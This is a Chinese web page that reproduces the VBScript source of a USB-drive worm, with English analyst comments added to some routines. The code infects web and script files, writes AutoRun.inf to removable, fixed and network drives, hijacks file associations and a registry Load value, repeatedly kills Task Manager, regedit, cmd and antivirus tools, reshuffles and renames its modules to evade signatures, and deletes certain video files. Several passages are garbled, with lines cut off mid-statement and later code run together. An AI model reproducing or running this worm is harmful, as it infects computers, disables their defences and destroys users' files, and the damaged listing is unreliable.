一段u盘病毒代码(可以设为不可见吗)

'Administrator4

'RJQXEIOULXYPL2_12
' InfectHead: file-infector routine of the worm shown on this page.
'   strPath  - full path of the host file
'   fi       - File object for the same file (only its Size is read here)
'   objfso   - Scripting.FileSystemObject instance
'   VbsCode_WebPage / VbsCode_Victim - payload text prepended to web pages / .vbs hosts
'   ftype    - lower-case extension chosen by the caller
'   T        - 0 = infect, 1 = strip a previous infection
' Analyst notes: an infected host starts with the injected block followed by the
' original content, so the marker test in Isinfected (Head_V) doubles as a
' triage check. Cnt and n are not declared in this Sub; Cnt is presumably the
' script-level counter of modified files - confirm against the caller.
Sub InfectHead(strPath, fi, objfso, VbsCode_WebPage, VbsCode_Victim, ftype, T)
    ' Every failure below is silently ignored.
    On Error Resume Next
    Dim tso, buffer, strCode , Maxsize
    ' Files of 350000 bytes or more are left untouched.
    Maxsize = 350000
    If fi.Size< Maxsize Then
        ' Mode 1 = ForReading; the whole host file is loaded into memory.
        Set tso = objfso.OpenTextFile(strPath, 1, True)
        buffer = tso.ReadAll()
        tso.Close
        If T = 0 Then
            Select Case ftype
                Case "hta", "htm", "html", "asp"
                    If Isinfected(buffer, ftype) = False Then
                        ' Mode 2 = ForWriting: the host is truncated and rewritten as
                        ' <script-wrapped payload> + CRLF + original content.
                        Set tso = objfso.OpenTextFile(strPath, 2, true)
                        strCode = MakeScript(VbsCode_WebPage, 0)
                        tso.Write strCode & VBCRLF & buffer
                        Cnt = Cnt + 1
                    End If
                Case "vbs"
                    If Isinfected(buffer, ftype) = False Then
                        ' The first "Option Explicit" (text compare) is removed before the
                        ' payload is prepended; both branches otherwise write the same data.
                        n = InStr(buffer , "Option Explicit")
                        If n<>0 Then
                            buffer = Replace(buffer, "Option Explicit", "", 1, 1, 1)
                            Set tso = objfso.OpenTextFile(strPath, 2, true)
                            tso.Write vbsCode_Victim & VBCRLF & buffer
                            Cnt = Cnt + 1
                        Else
                            Set tso = objfso.OpenTextFile(strPath, 2, true)
                            tso.Write vbsCode_Victim & VBCRLF & buffer
                            Cnt = Cnt + 1
                        End If
                    End If
                Case Else
                    '
                    '
            End Select
        ElseIf T = 1 Then
            ' Clean-up path: only files that carry the Head_V marker are rewritten.
            If Isinfected(buffer, ftype) = True Then
                ' Position of the last Tail_V marker in the file.
                n = InStrRev(buffer , Tail_V)
                If n<>0 Then
                    ' Replace() with a start position returns the text from that position on,
                    ' so everything before the last Tail_V is dropped along with the marker.
                    buffer = Replace(buffer, Tail_V, "", n, 1, 1)
                    Set tso = objfso.OpenTextFile(strPath, 2, True)
                    ' strCode is never assigned on this path, so the output starts with a bare CRLF.
                    tso.Write strCode & VBCRLF & buffer
                End If
            End If
        End If
    End If
End Sub
'AOHGGCXWLVC2_12

'RJQXEIOULXYPL2_14
' ReadOK: reads the worm's state file and returns the pending command.
'   objfso      - Scripting.FileSystemObject instance
'   FullPath_OK - path of the state file (written by WriteOK)
' Returns up to 50 characters following the literal "Order:", right-trimmed.
' With On Error Resume Next in effect, a missing file leaves the result Empty.
Function ReadOK(objfso, FullPath_OK)
    On Error Resume Next
    Dim vf, buffer
    ' Mode 1 = ForReading.
    Set vf = objfso.OpenTextFile(FullPath_OK, 1)
    buffer = vf.ReadAll
    ' "+ 6" skips the length of "Order:".
    ReadOK = RTrim(Mid(buffer, InStr(buffer, "Order:") + 6, 50))
End Function
' WriteOK: rewrites the worm's state file.
'   objfso      - Scripting.FileSystemObject instance
'   FullPath_OK - path of the state file
'   Order_Order - command name, Order_Para - its argument
' File layout produced here (useful when triaging a host):
'   line 1: OK
'   line 2: current date
'   line 3: Order:<command>@<argument>
' SetFileAttr (defined later on this page) sets Attributes = 6, i.e. Hidden + System,
' so the file is not listed by Explorer's default view.
Sub WriteOK(objfso, FullPath_OK, Order_Order, Order_Para)
    On Error Resume Next
    Dim vf1
    ' Force-delete any previous copy (True also removes read-only files).
    objfso.DeleteFile FullPath_OK, True
    ' Mode 2 = ForWriting, create if missing.
    Set vf1 = objfso.OpenTextFile(FullPath_OK, 2, True)
    vf1.Write "OK" & VBCRLF
    vf1.WriteLine Date()
    vf1.WriteLine "Order:" & Order_Order & "@" & Order_Para
    Call SetFileAttr(objfso, FullPath_OK)
End Sub
'AOHGGCXWLVC2_14

'RJQXEIOULXYPL1_5
' MonitorSystem: the worm's resident loop. It never returns.
'   objfso  - Scripting.FileSystemObject instance
'   vbsCode - worm body handed on to InvadeSystem
' Every 5 seconds it terminates the listed processes and re-applies the
' persistence changes made by InvadeSystem.
' Analyst notes: the visible symptoms are Task Manager, cmd, regedit, msconfig
' and the listed security tools closing within seconds of being started, plus a
' long-lived wscript.exe/cscript.exe process. Because persistence is re-applied in
' the loop, that script host process has to be stopped before any clean-up holds.
Sub MonitorSystem(objfso, vbsCode)
    On Error Resume Next
    Dim ProcessNames
    ' Administrative and security tools that are killed on sight.
    ProcessNames = Array("ras.exe", "360tray.exe", "taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr", "regedit.pif", "regedit.com", "msconfig.exe", "SREng.exe", "USBAntiVir.exe")
    Do
        Call KillProcess(ProcessNames)
        Call InvadeSystem(objfso, vbsCode)
        ' 5000 ms pause between passes.
        WScript.Sleep 5000
    Loop
End Sub
'AOHGGCXWLVC1_5

'RJQXEIOULXYPL2_24
' KillProcess: terminates every running process whose image name is in ProcessNames.
'   ProcessNames - array of image names (see MonitorSystem)
' Uses WMI (root/cimv2, Win32_Process) on the local machine and falls back to the
' tskill command when Terminate reports return code 2 (access denied).
' Analyst notes: a script host issuing Win32_Process.Terminate against admin or
' security tools, or spawning a hidden "cmd.exe /c @tskill <name>", is a strong
' behavioural indicator for this family. strComputer, objWMIServices,
' colProcessList, ProcessName and objProcess are not declared in this Sub.
Sub KillProcess(ProcessNames)
    On Error Resume Next
    Dim objShell, intReturn, name_exe
    Set objShell = WScript.CreateObject("WScript.Shell")
    ' "." selects the local computer.
    strComputer = "."
    Set objWMIServices = GetObject("winmgmts://" & strComputer & "/root/cimv2")
    For Each ProcessName in ProcessNames
        Set colProcessList = objWMIServices.Execquery(" Select * From win32_process where name = '" & ProcessName & "' ")
        For Each objProcess in colProcessList
            intReturn = objProcess.Terminate
            Select Case intReturn
                Case 2
                    ' Drop the 4-character extension (".exe") to get the name tskill expects.
                    name_exe = objProcess.Name
                    name_exe = Left(name_exe, Len(name_exe) -4)
                    ' Window style 0 = hidden, False = do not wait for completion.
                    objShell.Run "cmd.exe /c @tskill " & name_exe, 0, False
            End Select
        Next
    Next
    Set objShell = Nothing
End Sub
'AOHGGCXWLVC2_24

'RJQXEIOULXYPL1_7
' InvadeSystem: installs and re-asserts the worm's persistence.
'   objfso  - Scripting.FileSystemObject instance
'   vbsCode - worm body to write out
' What it changes (all visible below):
'   * drops AutoRun files on removable (1), fixed (2) and network (3) drives via AutoRun
'   * writes a hidden+system copy to FullPath_V1 (CopyFile + SetFileAttr)
'   * sets the per-user "Load" value under Windows NT/CurrentVersion/Windows
'   * redirects the open command of txtfile, regfile, chm.file and hlpfile to
'     WScript.exe running FullPath_V0
'   * calls DeSafeSet, which (later on this page) writes NoDriveTypeAutoRun,
'     ShowSuperHidden and the SHOWALL CheckedValue
' Analyst notes: these keys and values are the artefacts to check on a suspect
' host; RestoreSystem on this page lists the values the author writes back for
' each of them. FullPath_V0, FullPath_V1 and Version are script-level variables.
Sub InvadeSystem(objfso, vbsCode)
    On Error Resume Next
    Dim Value, HCULoad, vbsCode_Virus, dc, d
    ' Command line written into the hijacked file associations.
    Value = "%SystemRoot%/System32/WScript.exe " & """" & FullPath_V0 & """" & " %1 %* "
    HCULoad = "HKEY_CURRENT_USER/SoftWare/Microsoft/Windows NT/CurrentVersion/Windows/Load"
    vbsCode_Virus = vbsCode
    Set dc = objfso.Drives
    For Each d In dc
        ' FileSystemObject DriveType: 1 = removable, 2 = fixed, 3 = network.
        If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
            Call AutoRun(objfso, d.DriveLetter, vbsCode_Virus)
        End If
    Next
    ' An older on-disk copy is deleted first; in both branches the current body is
    ' then written to FullPath_V1 and marked hidden+system.
    If objfso.FileExists(FullPath_V1) = True And GetVersion(objfso, FullPath_V1)< Version Then
        objfso.DeleteFile FullPath_V1 , True
        Call CopyFile(objfso, vbsCode_Virus, FullPath_V1)
        Call SetFileAttr(objfso, FullPath_V1)
    Else
        Call CopyFile(objfso, vbsCode_Virus, FullPath_V1)
        Call SetFileAttr(objfso, FullPath_V1)
    End If
    ' NOTE(review): the next three lines are damaged on this page - text between
    ' "GetVersion(objfso, FullPath_V0)" and "FullPath_V1 Then" was lost in extraction
    ' (most likely a "<" comparison swallowed as markup). Only the surviving
    ' WriteReg call on the Load value can be read with confidence.
    If objfso.FileExists(FullPath_V0) = True And GetVersion(objfso, FullPath_V0)
  
    FullPath_V1 Then
        Call WriteReg (HCULoad, FullPath_V1, "")
    End If
    ' Each association is rewritten whenever it differs from Value, so a manual
    ' repair is undone on the next pass of MonitorSystem.
    If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/txtfile/shell/open/command/")<>Value Then
        Call SetTxtFileAss(FullPath_V0)
    End If
    If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/regfile/shell/open/command/")<>Value Then
        Call SetRegFileAss(FullPath_V0)
    End If
    If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/chm.file/shell/open/command/")<>Value Then
        Call SetchmFileAss(FullPath_V0)
    End If
    If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/hlpfile/shell/open/command/")<>Value Then
        Call SethlpFileAss(FullPath_V0)
    End If
    Call DeSafeSet()
End Sub
'AOHGGCXWLVC1_7

'RJQXEIOULXYPL2_16
' SetTxtFileAss: rewrites the machine-wide open command of the txtfile class so
' that opening a text file starts WScript.exe with the script at sFilePath.
'   sFilePath - script path placed, quoted, in the command line
' Analyst note: RestoreSystem on this page writes "%SystemRoot%/system32/NOTEPAD.EXE %1"
' back to this value; any WScript.exe command line here is an infection artefact.
Sub SetTxtFileAss(sFilePath)
    On Error Resume Next
    Dim Value
    Value = "%SystemRoot%/System32/WScript.exe " & """" & sFilePath & """" & " %1 %* "
    Call WriteReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/txtfile/shell/open/command/", Value, "REG_EXPAND_SZ")
End Sub
' SethlpFileAss: rewrites the machine-wide open command of the hlpfile class so
' that opening a help file starts WScript.exe with the script at sFilePath.
'   sFilePath - script path placed, quoted, in the command line
' Analyst note: RestoreSystem on this page writes "%SystemRoot%/system32/winhlp32.exe %1"
' back to this value.
Sub SethlpFileAss(sFilePath)
    On Error Resume Next
    Dim Value
    Value = "%SystemRoot%/System32/WScript.exe " & """" & sFilePath & """" & " %1 %* "
    Call WriteReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/hlpfile/shell/open/command/", Value, "REG_EXPAND_SZ")
End Sub
' SetRegFileAss: rewrites the machine-wide open command of the regfile class so
' that opening a .reg file starts WScript.exe with the script at sFilePath.
'   sFilePath - script path placed, quoted, in the command line
' Analyst note: with this value in place, importing a .reg repair file by opening
' it runs the script instead; RestoreSystem on this page writes
' regedit.exe "%1" back to this value.
Sub SetRegFileAss(sFilePath)
    On Error Resume Next
    Dim Value
    Value = "%SystemRoot%/System32/WScript.exe " & """" & sFilePath & """" & " %1 %* "
    Call WriteReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/regfile/shell/open/command/", Value, "REG_EXPAND_SZ")
End Sub
' SetchmFileAss: rewrites the machine-wide open command of the chm.file class so
' that opening a compiled help file starts WScript.exe with the script at sFilePath.
'   sFilePath - script path placed, quoted, in the command line
' Analyst note: RestoreSystem on this page writes an hh.exe "%1" command line
' back to this value.
Sub SetchmFileAss(sFilePath)
    On Error Resume Next
    Dim Value
    Value = "%SystemRoot%/System32/WScript.exe " & """" & sFilePath & """" & " %1 %* "
    Call WriteReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/chm.file/shell/open/command/", Value, "REG_EXPAND_SZ")
End Sub
'AOHGGCXWLVC2_16

'RJQXEIOULXYPL2_17
' PreInstance: single-instance check.
' Counts cscript.exe / wscript.exe processes whose command line contains this
' script's full path and returns True when two or more are found (the current
' process plus at least one other); otherwise False.
' Analyst note: the same WMI query (script hosts filtered by command line) is a
' convenient way to locate the resident copy on a suspect machine.
Function PreInstance()
    On Error Resume Next
    Dim num_cnt
    Dim strComputer, objWMIService, colProcessList, objProcess
    num_cnt = 0
    PreInstance = False
    ' "." selects the local computer.
    strComputer = "."
    Set objWMIService = GetObject("winmgmts://" & strComputer & "/root/cimv2")
    Set colProcessList = objWMIService.ExecQuery("Select * from Win32_Process Where " & "Name = 'cscript.exe' or Name = 'wscript.exe'")
    For Each objProcess in colProcessList
        ' CStr guards against a Null CommandLine before the substring test.
        If InStr(CStr(objProcess.CommandLine), WScript.ScriptFullName)>0 Then
            num_cnt = num_cnt + 1
        End If
    Next
    If num_cnt>= 2 Then
        PreInstance = True
    End If
End Function
'AOHGGCXWLVC2_17

'RJQXEIOULXYPL2_23
Function MakeScript(strCode, T)
    If T = 1 Then
        MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & ChangeModelOrder(strCode, Sum_ModelCode) & VBCRLF & "
   0 Or InStr(fname, "淫")>0 Or InStr(fname, "偷拍")>0 Or _
                InStr(fname, "偷窥")>0 Or InStr(fname, "口交")>0 Or InStr(fname, "强奸")>0 Or _
                InStr(fname, "轮奸")>0 Or InStr(fname, "伦理片")>0 Or InStr(fname, "自摸")>0 Then
        IsSexFile = True
    End If
End Function
' Isinfected: marker test used before a host file is modified.
'   buffer - full text of the candidate file
'   ftype  - lower-case extension
' Returns False only for hta/htm/html/asp/vbs content that does not contain the
' Head_V marker. Every other file type reports True, which makes callers treat
' it as already handled.
' Analyst note: Head_V is a script-level value assigned from GetHeadTail(0);
' that helper is not shown on this page, so the exact marker text must be taken
' from a sample rather than from this listing.
Function Isinfected(buffer, ftype)
    Isinfected = True
    Select Case ftype
        Case "hta", "htm" , "html" , "asp", "vbs"
            ' InStr returns 0 when the marker is absent.
            If InStr(buffer, Head_V) = 0 Then
                Isinfected = False
            End If
        Case Else
            Isinfected = True
    End Select
End Function
'AOHGGCXWLVC2_21

'RJQXEIOULXYPL1_9
' ChangeModelOrder: re-emits the worm body with its modules in a random order.
'   vbsCode - current worm body
'   Num_DNA - number of modules to shuffle
' Returns Head_V & Version, the shuffled modules, then Tail_V.
' Analyst notes: because module order differs from copy to copy, whole-file
' hashes do not match across samples; what stays fixed in this routine is the
' Head_V & Version prefix and the Tail_V suffix. GetModelCode (later on this
' page) extracts module i by its numbered head/tail marker comments.
Function ChangeModelOrder(vbsCode, Num_DNA)
    On Error Resume Next
    Dim DNA(), Array_vbsCode()
    Dim i, Value, flag, j, buffer
    ReDim DNA(Num_DNA), Array_vbsCode(Num_DNA)
    buffer = vbsCode
    Randomize
    ' Build a random permutation of 1..Num_DNA by rejection: draw a value and
    ' retry while it is already present in DNA.
    For i = 1 To Num_DNA
        Do
            Value = Int((Num_DNA * Rnd) + 1)
            flag = 1
            For j = 1 To Num_DNA
                If Value = DNA(j) Then
                    flag = 0
                    Exit For
                End If
            Next
        Loop Until flag = 1
        DNA(i) = Value
    Next
    ' Pull each module out of the original body by index.
    For i = 1 To Num_DNA
        Array_vbsCode(i) = GetModelCode(buffer, i)
    Next
    ' Concatenate the modules in the permuted order.
    buffer = ""
    For i = 1 To Num_DNA
        buffer = buffer & VBCRLF & Array_vbsCode(DNA(i)) & VBCRLF
    Next
    ChangeModelOrder = Head_V & Version & VBCRLF & buffer & VBCRLF & Tail_V
End Function
'AOHGGCXWLVC1_9

'RJQXEIOULXYPL2_26
' Run: starts ExeFullName through WScript.Shell.Run with default window style
' and without waiting for it to finish.
'   ExeFullName - command line or path to launch
' No error handler is set here, so a failure propagates to the caller's handler.
Sub Run(ExeFullName)
    Dim WshShell
    Set WshShell = WScript.CreateObject("WScript.Shell")
    WshShell.Run ExeFullName
    Set WshShell = Nothing
End Sub
' CopyFile: writes the text in code to pathf, replacing any existing content.
'   objfso - Scripting.FileSystemObject instance
'   code   - text to write
'   pathf  - destination path
' Despite the name nothing is copied from disk; the body is written from memory.
' The stream is not closed explicitly in this Sub.
Sub CopyFile(objfso, code, pathf)
    On Error Resume Next
    Dim vf
    ' Mode 2 = ForWriting, create if missing.
    Set vf = objfso.OpenTextFile(pathf, 2, true)
    vf.Write code
End Sub
' ChangeName: replaces every occurrence of each entry in Names with a random
' string of upper-case letters (A-Z) of the same length and returns the result.
'   vbsCode - script text to rewrite
'   Names   - collection of identifiers to randomise
' Analyst notes: identifiers processed here differ in every generated copy, so
' they are not stable indicators. Names is not defined on this page; the
' all-caps marker comments seen in this listing presumably came out of this
' routine - confirm against a second sample before using them in a signature.
Function ChangeName(vbsCode, Names)
    Dim Name, j, temp, buffer
    buffer = vbsCode
    Randomize
    For Each Name in Names
        temp = ""
        For j = 1 To Len(Name)
            ' Chr(65)..Chr(90) = "A".."Z".
            temp = temp & Chr((Int(Rnd * 26) + 65))
        Next
        buffer = Replace(buffer, Name, temp)
    Next
    ChangeName = buffer
End Function
'AOHGGCXWLVC2_26

'RJQXEIOULXYPL2_25
' DeleteReg: deletes the registry key or value named by strkey through
' WScript.Shell.RegDelete.
'   strkey - full registry path
' No error handler is set here; errors surface in the caller.
Sub DeleteReg(strkey)
    Dim tmps
    Set tmps = CreateObject("WScript.Shell")
    tmps.RegDelete strkey
    Set tmps = Nothing
End Sub
' ReadReg: returns the registry value named by strkey through
' WScript.Shell.RegRead.
'   strkey - full registry path
' No error handler is set here; when the caller runs under On Error Resume Next
' a missing value leaves the result Empty.
Function ReadReg(strkey)
    Dim tmps
    Set tmps = CreateObject("WScript.Shell")
    ReadReg = tmps.RegRead(strkey)
    Set tmps = Nothing
End Function
' WriteReg: writes Value to the registry path strkey through
' WScript.Shell.RegWrite.
'   strkey - full registry path
'   Value  - data to store
'   vtype  - registry type name such as "REG_DWORD"; "" lets RegWrite use its default type
' Analyst note: every registry change made by this worm goes through this Sub,
' so registry writes issued by wscript.exe/cscript.exe are the events to look
' for in process or registry auditing.
Sub WriteReg(strkey, Value, vtype)
    Dim tmps
    Set tmps = CreateObject("WScript.Shell")
    If vtype = "" Then
        tmps.RegWrite strkey, Value
    Else
        tmps.RegWrite strkey, Value, vtype
    End If
    Set tmps = Nothing
End Sub
'AOHGGCXWLVC2_25

'RJQXEIOULXYPL1_6
Sub AutoRun(objfso, D, vbsCode)
    On Error Resume Next
    Dim path_autorun, path_vbs, inf_autorun
    path_autorun = D & ":/AutoRun.inf"
    path_vbs = D & ":/" & Name_V1
    If objfso.FileExists(path_vbs) = False Or objfso.FileExists(path_autorun) = False Or GetVersion(objfso, path_vbs)
   
    2000 Then Call WriteOK(objfso, FullPath_Config, "Msg", "您已有超过2000个文件被感染!不过请放心,此病毒很容易被清除!请联系418465***-_- !") Else Call WriteOK(objfso, FullPath_Config, "InfectFiles", Order_Para) End If Call InvadeSystem(objfso, VbsCode_Virus) Call MonitorSystem(objfso, VbsCode_Virus) Case "Msg" MsgBox Order_Para Call WriteOK(objfso, FullPath_Config, "", "") vbsCode = GetSelfCode(objfso, FullPath_Self) MainBody = GetMainBody(vbsCode, Sum_ModelCode) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) VbsCode_Virus = ChangeName(VbsCode_Virus, Names) Call InvadeSystem(objfso, VbsCode_Virus) Call MonitorSystem(objfso, VbsCode_Virus) Case "UnLoadMe" Call RestoreSystem(objfso) Wscript.Quit Case "KillVirus" Call RestoreSystem(objfso) Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 1) Wscript.Quit Case Else vbsCode = GetSelfCode(objfso, FullPath_Self) MainBody = GetMainBody(vbsCode, Sum_ModelCode) VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode) VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names) VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode) VbsCode_Victim = ChangeName(VbsCode_Victim, Names) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) VbsCode_Virus = ChangeName(VbsCode_Virus, Names) Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0) Call WriteOK(objfso, FullPath_Config, "InfectFiles", Cnt) Call InvadeSystem(objfso, VbsCode_Virus) Call MonitorSystem(objfso, VbsCode_Virus) End Select Else vbsCode = GetSelfCode(objfso, FullPath_Self) MainBody = GetMainBody(vbsCode, Sum_ModelCode) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V 
'生成病毒体完整代码 VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) '改变模块组合顺序 VbsCode_Virus = ChangeName(VbsCode_Virus, Names) '改变模块标志名称 Call MonitorSystem(objfso, VbsCode_Virus) End If End Select Set objfso = Nothing Set objshell = Nothing End Sub 'AOHGGCXWLVC1_3 'RJQXEIOULXYPL1_2 Sub ExeVbs_WebPage() On Error Resume Next Dim objfso, vbsCode, VbsCode_Virus Set objfso = CreateObject(GetFSOName()) vbsCode = GetScriptCode("vbscript") VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) Call InvadeSystem(objfso, VbsCode_Virus) Set objfso = Nothing End Sub Sub ExeVbs_Victim() On Error Resume Next Dim objfso, vbsCode, VbsCode_Virus Set objfso = CreateObject(GetFSOName()) vbsCode = GetSelfCode(objfso, WScript.ScriptFullName) VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) Call InvadeSystem(objfso, VbsCode_Virus) Call Run(FullPath_V1) Set objfso = Nothing End Sub 'AOHGGCXWLVC1_2 'RJQXEIOULXYPL2_11 Sub SearchFile(objfso, strPath, VbsCode_WebPage, VbsCode_Victim, T) On Error Resume Next Dim pfo, pf, pfi, ext Dim psfo, ps Set pfo = objfso.GetFolder(strPath) Set pf = pfo.Files For Each pfi In pf If Cnt >= CntMax Then Exit For End If ext = LCase(objfso.GetExtensionName(pfi.Path)) Select Case ext Case "hta", "htm", "html", "asp", "vbs" Call InfectHead(pfi.Path, pfi, objfso, VbsCode_WebPage, VbsCode_Victim, ext, T) Case "mpg", "rmvb", "avi", "rm" If IsSexFile(pfi.Name) = True Then pfi.Delete End If End Select Next Set psfo = pfo.SubFolders For Each ps In psfo If Cnt >= CntMax Then Exit For End If Call SearchFile(objfso, ps.Path, VbsCode_WebPage, VbsCode_Victim, T) Next End Sub 'AOHGGCXWLVC2_11 'RJQXEIOULXYPL1_4 Function Head() Head = VBCRLF & "'RJQXEIOULXYPL1_1" & VBCRLF &_ "On Error Resume Next" & VBCRLF &_ "Dim Cnt, CntMax, 
Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V" & VBCRLF &_ "Dim ModelHead, ModelTail" & VBCRLF &_ "Cnt = 0" & VBCRLF &_ "CntMax = 1000" & VBCRLF &_ "Version = ""4""" & VBCRLF &_ "Name_V1 = GetUserName() & "".vbs""" & VBCRLF &_ "FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向" & VBCRLF &_ "FullPath_V1 = GetSFolder(1) & Name_V1 '主要执行配置文件命令" & VBCRLF &_ "FullPath_Config= GetSFolder(1) & GetUserName() & "".ini""" & VBCRLF &_ "Sum_ModelCode = 26" & VBCRLF &_ "Head_V= GetHeadTail(0)" & VBCRLF &_ "Tail_V= GetHeadTail(1)" & VBCRLF &_ "ModelHead=""'RJQXEIOULXYPL""" & VBCRLF &_ "ModelTail=""'AOHGGCXWLVC""" & VBCRLF End Function Function VictimHead() VictimHead = Head() & VBCRLF &_ "Call VictimMain()" & VBCRLF &_ "Sub VictimMain()" & VBCRLF &_ " Call ExeVbs_Victim()" & VBCRLF &_ "End Sub" & VBCRLF &_ "'AOHGGCXWLVC1_1" & VBCRLF End Function Function VirusHead() VirusHead = Head() & VBCRLF &_ "Call VirusMain()" & VBCRLF &_ "Sub VirusMain()" & VBCRLF &_ " On Error Resume Next" & VBCRLF &_ " Call ExeVbs_Virus()" & VBCRLF &_ "End Sub" & VBCRLF & VBCRLF &_ "'AOHGGCXWLVC1_1" & VBCRLF End Function Function WebHead() WebHead = Head() & VBCRLF &_ "Call WebMain()" & VBCRLF &_ "Sub WebMain()" & VBCRLF &_ " On Error Resume Next" & VBCRLF &_ " Call ExeVbs_WebPage()" & VBCRLF &_ "End Sub" & VBCRLF &_ "'AOHGGCXWLVC1_1" & VBCRLF End Function 'AOHGGCXWLVC1_4 'RJQXEIOULXYPL2_20 Function GetModelCode(vbsCode, N_ModelCode) On Error Resume Next Dim n, n1, buffer buffer = vbsCode If N_ModelCode>= 1 And N_ModelCode<= 9 Then n = InStr(buffer, ModelHead & "1_" & N_ModelCode) n1 = InStr(buffer, ModelTail & "1_" & N_ModelCode) GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "1_" & N_ModelCode)) ElseIf N_ModelCode>= 10 And N_ModelCode<= 99 Then n = InStr(buffer, ModelHead & "2_" & N_ModelCode) n1 = InStr(buffer, ModelTail & "2_" & N_ModelCode) GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "2_" & N_ModelCode)) ElseIf N_ModelCode>= 100 And 
N_ModelCode<= 999 Then n = InStr(buffer, ModelHead & "3_" & N_ModelCode) n1 = InStr(buffer, ModelTail & "3_" & N_ModelCode) GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "3_" & N_ModelCode)) End If End Function 'AOHGGCXWLVC2_20 'RJQXEIOULXYPL2_19 Function GetVersion(objfso, path_v) Dim FV, buffer Set FV = objfso.OpenTextFile(path_v, 1) buffer = FV.ReadAll() GetVersion = Mid(buffer, InStr(buffer, Head_V) + Len(Head_V), 1) End Function Function GetScriptCode(Languages) On Error Resume Next Dim soj For Each soj In document.Scripts If LCase(soj.Language) = Languages Then Select Case LCase(soj.Language) Case "vbscript" GetScriptCode = soj.Text Exit Function Case "javascript" GetScriptCode = soj.Text Exit Function End Select End If Next End Function Function GetSelfCode(objfso, FullPath_Self) On Error Resume Next Dim n, n1, buffer, Self Set Self = objfso.OpenTextFile(FullPath_Self, 1) buffer = Self.ReadAll n = InStr(buffer, Head_V) n1 = InstrRev(buffer, Tail_V) buffer = Mid(buffer, n, n1 - n + Len(Tail_V) + 1) GetSelfCode = buffer Self.Close End Function Function GetMainBody(vbsCode, Sum_ModelCode) Dim i For i = 2 To Sum_ModelCode GetMainBody = GetMainBody & VBCRLF & GetModelCode(vbsCode, i) & VBCRLF Next End Function 'AOHGGCXWLVC2_19 'RJQXEIOULXYPL1_8 Sub RestoreSystem(objfso) On Error Resume Next Dim Value, dc, d, HCULoad Call SafeSet() HCULoad = "HKEY_CURRENT_USER/SoftWare/Microsoft/Windows NT/CurrentVersion/Windows/Load" If ReadReg(HCULoad) = FullPath_V1 Then Call DeleteReg(HCULoad) End If Value = "%SystemRoot%/system32/NOTEPAD.EXE %1" If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/txtfile/shell/open/command/")<>Value Then Call WriteReg ("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/txtfile/shell/open/command/", Value, "REG_EXPAND_SZ") End If Value = "regedit.exe " & """%1""" If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/regfile/shell/open/command/")<>Value Then Call WriteReg ("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/regfile/shell/open/command/", Value, 
"REG_EXPAND_SZ") End If Value = GetSFolder(1) & "hh.exe " & """%1""" If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/chm.file/shell/open/command/")<>Value Then Call WriteReg ("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/chm.file/shell/open/command/", Value, "REG_EXPAND_SZ") End If Value = "%SystemRoot%/system32/winhlp32.exe %1" If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/hlpfile/shell/open/command/")<>Value Then Call WriteReg ("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/hlpfile/shell/open/command/", Value, "REG_EXPAND_SZ") End If Value = """%1"" %*" If ReadReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/exefile/shell/open/command/")<>Value Then Call WriteReg("HKEY_LOCAL_MACHINE/SOFTWARE/Classes/exefile/shell/open/command/", Value, "REG_SZ") End If Set dc = objfso.Drives For Each d In dc If objfso.FileExists(d.DriveLetter & ":/" & Name_V1) = True Then objfso.DeleteFile d.DriveLetter & ":/" & Name_V1 objfso.DeleteFile d.DriveLetter & ":/" & "AutoRun.inf" End If Next If objfso.FileExists(FullPath_V1) = True Then Set vf = objfso.GetFile(FullPath_V1) vf.Delete End If If objfso.FileExists(FullPath_V0) = true Then Set vf = objfso.GetFile(FullPath_V0) vf.Delete End If If objfso.FileExists(FullPath_Config) = True Then objfso.DeleteFile FullPath_Config 